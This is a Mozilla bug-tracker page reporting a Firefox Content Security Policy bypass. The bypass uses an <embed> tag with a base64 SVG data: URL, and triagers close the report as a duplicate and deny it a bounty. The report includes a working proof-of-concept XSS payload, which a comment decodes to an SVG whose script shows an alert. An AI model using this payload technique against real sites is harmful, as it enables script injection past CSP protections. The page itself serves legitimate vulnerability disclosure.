Closed
Bug 1550499
Opened 6 years ago
Closed 6 years ago
CSP bypass use embed tag
Categories
(Core :: DOM: Security, defect)
Core
DOM: Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1457100
People
(Reporter: whitehat002, Unassigned)
References
Details
(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(1 file)
|
160.92 KB,
image/png
|
Details |
csp.png
At present, there are some problems with this tag. You can't get related information such as domain or cookie, but you can bypass csp and execute xss.
xss payload
<meta http-equiv="Content-Security-Policy" content="script-src 'none'">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoL2NzcCBieXBhc3MvKTs8L3NjcmlwdD48L3N2Zz4=" AllowScriptAccess="always"></EMBED>
Flags: sec-bounty?
|
||
Comment 1•6 years ago
|
||
For reference, the SVG provided is:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
<script type="text/ecmascript">alert(/csp bypass/);</script>
</svg>
This seems like it's effectively the same as bug 1550414.
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Security
Product: Firefox → Core
See Also: → 1550414
|
|
||
Updated•6 years ago
|
Type: task → defect
Yes,Maybe the same as #1550414. , only the labels used are different.
|
||
Comment 3•6 years ago
|
||
Slightly different: <embed> and <object> need to inherit the parent document's CSP (as <iframe> does) for data: URLs.
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
Although this vulnerability is repeated, will this vulnerability be fixed?
|
||
Comment 5•6 years ago
|
||
(In reply to hackyzh from comment #4)
Although this vulnerability is repeated, will this vulnerability be fixed?
At some point.
This is not a bounty eligible report.
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•2 years ago
|
Group: dom-core-security
|
||
Updated•6 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•